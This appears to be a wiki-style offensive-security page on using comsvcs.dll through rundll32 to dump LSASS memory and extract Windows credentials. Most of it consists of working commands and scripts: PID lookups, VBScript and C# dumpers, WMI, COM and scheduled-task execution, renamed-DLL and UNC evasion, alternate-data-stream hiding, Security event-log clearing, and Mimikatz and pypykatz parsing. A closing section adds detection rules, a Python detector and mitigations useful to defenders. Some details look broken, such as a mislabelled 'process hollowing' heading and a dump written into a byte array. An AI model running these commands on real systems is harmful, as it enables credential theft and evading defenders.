
Comsvcs

Comsvcs.dll is a Windows system library that contains MiniDump functionality. It is commonly leveraged, via the built-in rundll32.exe, to dump LSASS process memory so credentials can be extracted offline without dropping a custom dumping tool that common detections would flag.

Overview

Comsvcs.dll exports functions that can be abused to dump LSASS memory. The DLL is part of Component Object Model (COM) infrastructure and is legitimately used by Windows services. By using rundll32.exe to call comsvcs functions, attackers can dump memory with reduced detection.

Basic Dumping

Standard rundll32 LSASS Dump

# Basic syntax: rundll32.exe comsvcs.dll MiniDump <PID> <output_file> full
rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump 632 C:\temp\lsass.dmp full

# Get LSASS PID first (cmd)
tasklist /FI "IMAGENAME eq lsass.exe"

# Get LSASS PID (PowerShell)
$lsassPID = Get-Process lsass | Select-Object -ExpandProperty Id

Using rundll32 with Obfuscation

# Using indirect reference
rundll32.exe comsvcs.dll MiniDump $(Get-Process lsass).Id C:\temp\dump.bin full

# Using WMI to get LSASS PID
rundll32.exe comsvcs.dll MiniDump (Get-WmiObject Win32_Process -Filter "name='lsass.exe'").ProcessId C:\temp\lsass.dmp full

# Using System.Diagnostics
rundll32.exe comsvcs.dll MiniDump ([System.Diagnostics.Process]::GetProcessesByName('lsass')[0].Id) C:\temp\lsass.dmp full

Advanced Techniques

Memory Dump with Process Hollowing

# Create process dump with specific options
rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump 632 C:\temp\output.dmp full 1

# Parameters:
# - full: includes all memory sections
# - 1: full dump mode

Dumping to Alternate Data Stream (ADS)

# Write dump to alternate data stream to hide from directory listing
rundll32.exe comsvcs.dll MiniDump 632 C:\temp\file.txt:dump.bin full

# Read ADS
Get-Content -Path C:\temp\file.txt -Stream dump.bin -Raw | Out-File C:\temp\extracted.dmp -Encoding Byte

Using VBScript for Execution

' Create shell object and execute rundll32
Set objShell = CreateObject("WScript.Shell")
Set objWMI = GetObject("winmgmts:")

' Get LSASS PID
Set colProcess = objWMI.ExecQuery("Select ProcessId From Win32_Process Where Name='lsass.exe'")
For Each objProcess In colProcess
    strPID = objProcess.ProcessId
Next

' Execute dump
objShell.Run "rundll32.exe comsvcs.dll MiniDump " & strPID & " C:\temp\lsass.dmp full"

Using C# for Dumping

using System;
using System.Diagnostics;

class ComsvcsExploit
{
    static void Main()
    {
        // Get LSASS process
        Process[] processes = Process.GetProcessesByName("lsass");
        if (processes.Length > 0)
        {
            int lsassPID = processes[0].Id;

            // Execute rundll32 with comsvcs
            ProcessStartInfo psi = new ProcessStartInfo
            {
                FileName = "rundll32.exe",
                Arguments = $"comsvcs.dll MiniDump {lsassPID} C:\\temp\\lsass.dmp full",
                CreateNoWindow = true,
                UseShellExecute = false
            };

            Process proc = Process.Start(psi);
            proc.WaitForExit();
        }
    }
}

Defense Evasion

Living off the Land Variants

# Using System32 path bypass
C:\Windows\SysWOW64\rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump <PID> output.dmp full

# Using UNC path
rundll32.exe \\127.0.0.1\C$\Windows\System32\comsvcs.dll MiniDump 632 output.dmp full

# Using alternative extensions
copy C:\Windows\System32\comsvcs.dll C:\temp\comsvcs.dat
rundll32.exe C:\temp\comsvcs.dat MiniDump 632 output.dmp full

Execution via WMI

# Using WMI to execute rundll32
$process = Get-WmiObject Win32_Process -Filter "name='lsass.exe'"
Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList "rundll32.exe comsvcs.dll MiniDump $($process.ProcessId) C:\temp\dump.dmp full"

Execution via COM Interface

# Using COM for execution (less common detection)
$com = New-Object -ComObject "Shell.Application"
$com.ShellExecute("rundll32.exe", "comsvcs.dll MiniDump 632 C:\temp\lsass.dmp full")

Credential Extraction

Parsing Dump Files with Mimikatz

# Using Mimikatz to parse dumped LSASS memory
mimikatz.exe "sekurlsa::minidump C:\temp\lsass.dmp" "sekurlsa::logonpasswords" "exit"

# Full extraction pipeline
mimikatz.exe "sekurlsa::minidump C:\temp\lsass.dmp" "sekurlsa::logonpasswords" "token::elevate" "vault::cred /patch" "exit"

Using Pypykatz (Linux parsing)

# Parse Windows LSASS dump on Linux
pypykatz lsa minidump lsass.dmp

# Export to JSON
pypykatz lsa minidump lsass.dmp -o json > creds.json

# Parse with detailed output
pypykatz lsa minidump lsass.dmp -v

Detection Evasion

Reducing Detectable Artifacts

# Dump to memory and avoid disk writes
$bytes = New-Object System.Byte[] (1000000)
rundll32.exe comsvcs.dll MiniDump 632 $bytes full

# Use temp folder less commonly monitored
rundll32.exe comsvcs.dll MiniDump 632 C:\ProgramData\dump.bin full

# Clear Event Log after dump
Clear-EventLog -LogName Security

Time-based Execution

# Schedule dump during off-hours
# Run at 2 AM
$trigger = New-ScheduledTaskTrigger -At 2:00AM -Daily
$action = New-ScheduledTaskAction -Execute "rundll32.exe" -Argument "comsvcs.dll MiniDump 632 C:\temp\dump.dmp full"
Register-ScheduledTask -TaskName "ComsvcsTask" -Trigger $trigger -Action $action

Defensive Measures

EDR/AV Detection Signatures

Detection typically focuses on:

  • rundll32.exe calling comsvcs.dll MiniDump
  • LSASS memory access patterns
  • Dump files created in unusual locations
  • Registry monitoring for persistence attempts

Windows Defender/Defender for Endpoint

# Monitor for comsvcs exploitation: list 4688 process-creation events whose command line mentions comsvcs or MiniDump.
# Requires the "Include command line in process creation events" audit policy, otherwise 4688 carries no CommandLine field.
# The Event Log XPath subset does not support contains(), so filter the text output instead.
wevtutil qe Security /q:"*[System[(EventID=4688)]]" /f:text | findstr /i "comsvcs MiniDump"

Sysmon Detection Rules

<!-- Detect rundll32 invoking MiniDump. Fields inside a filter are OR-ed unless wrapped in a Rule
     with groupRelation="and"; without it every rundll32 launch would be logged. Matching on
     MiniDump rather than comsvcs also catches a copy of the DLL renamed to another extension. -->
<Sysmon schemaversion="4.22">
  <EventFiltering>
    <RuleGroup name="" groupRelation="or">
      <ProcessCreate onmatch="include">
        <Rule groupRelation="and" name="T1003.001 rundll32 comsvcs MiniDump">
          <Image condition="image">rundll32.exe</Image>
          <CommandLine condition="contains">MiniDump</CommandLine>
        </Rule>
      </ProcessCreate>
    </RuleGroup>
  </EventFiltering>
</Sysmon>
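The following is an added detection example, not code from the original page: it scores exported CommandLine values (as recorded by Sysmon Event ID 1 or Security 4688) for the comsvcs MiniDump pattern and the evasion variants described above (SysWOW64 rundll32, UNC path to the DLL, renamed copy of the DLL, output to an alternate data stream). The sample events are constructed for the example.

```python
import re

# Constructed sample CommandLine values in the shape Sysmon Event ID 1 / Security 4688
# record them; none of these are real telemetry.
SAMPLE_EVENTS = [
    r'rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump 632 C:\temp\lsass.dmp full',
    r'C:\Windows\SysWOW64\rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump 632 output.dmp full',
    r'rundll32.exe \\127.0.0.1\C$\Windows\System32\comsvcs.dll MiniDump 632 output.dmp full',
    r'rundll32.exe C:\temp\comsvcs.dat MiniDump 632 output.dmp full',
    r'rundll32.exe comsvcs.dll MiniDump 632 C:\temp\file.txt:dump.bin full',
    r'rundll32.exe shell32.dll,Control_RunDLL desk.cpl',           # benign rundll32 use
    r'"C:\Program Files\Vendor\comsvcs-updater.exe" --check',      # benign, only the word matches
]

RUNDLL32 = re.compile(r'(^|[\\\s"])rundll32(\.exe)?\b', re.I)
MINIDUMP = re.compile(r'\bminidump\b', re.I)
COMSVCS = re.compile(r'comsvcs\.dll', re.I)
UNC_DLL = re.compile(r'\\\\[^\\\s]+\\[a-z]\$\\', re.I)           # \\host\C$\...
ADS_OUT = re.compile(r'[a-z]:\\[^\s:]+:[^\s:\\]+', re.I)        # C:\dir\file.txt:stream
WOW64 = re.compile(r'syswow64\\rundll32', re.I)

def analyse(cmdline: str) -> list[str]:
    """Return the reasons a command line looks like a comsvcs MiniDump; [] means not flagged."""
    reasons: list[str] = []
    if not RUNDLL32.search(cmdline):
        return reasons                      # only rundll32 invocations are in scope here
    if MINIDUMP.search(cmdline):
        reasons.append("rundll32 invoking MiniDump export")
        if not COMSVCS.search(cmdline):     # DLL copied under another name (e.g. comsvcs.dat)
            reasons.append("MiniDump without comsvcs.dll in command line (renamed copy?)")
    elif COMSVCS.search(cmdline):
        reasons.append("rundll32 loading comsvcs.dll")
    if reasons:                             # enrich the alert with the evasion variants present
        if UNC_DLL.search(cmdline):
            reasons.append("DLL loaded over UNC admin share")
        if ADS_OUT.search(cmdline):
            reasons.append("output written to alternate data stream")
        if WOW64.search(cmdline):
            reasons.append("32-bit rundll32 from SysWOW64")
    return reasons

def scan(events: list[str]) -> dict[str, list[str]]:
    """Map each flagged command line to its reasons; clean lines are omitted."""
    return {e: r for e in events if (r := analyse(e))}

if __name__ == "__main__":
    for cmd, reasons in scan(SAMPLE_EVENTS).items():
        print(f"ALERT {cmd}\n   -> {'; '.join(reasons)}")
```

Command-line matching alone will not see a rundll32.exe that was itself renamed; pair it with Sysmon's OriginalFileName field or with process-access auditing on lsass.exe.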

Mitigation Strategies

Defensive Techniques

  • LSA Protection: run LSASS as a protected process (RunAsPPL) and enable Credential Guard to protect LSASS memory
  • Process Access Auditing: Monitor unusual process access to lsass.exe
  • Disable rundll32: Restrict or monitor rundll32.exe execution
  • Application Control: Use AppLocker/WDAC to restrict DLL execution

Windows Defender Exploit Guard

# Enable controlled folder access to protect temp locations
Set-MpPreference -EnableControlledFolderAccess Enabled

# Ensure real-time protection stays enabled (this does not exclude LSASS from anything; it keeps monitoring on)
Set-MpPreference -DisableRealtimeMonitoring $false

Alternative Tools

  • Procdump (Microsoft Sysinternals): Legitimate dump tool
  • nanodump: Reflective DLL that dumps LSASS
  • Handle: Alternative memory access method
  • MalMemGames: Memory dumping bypass techniques

MITRE ATT&CK Mapping

  • LSASS Memory Dumping: T1003.001
  • Credential Dumping: T1003
  • Signed Binary Proxy Execution: T1218
  • Living Off The Land Binaries (LOLBins): Execution via comsvcs

Last updated: 2026-03-30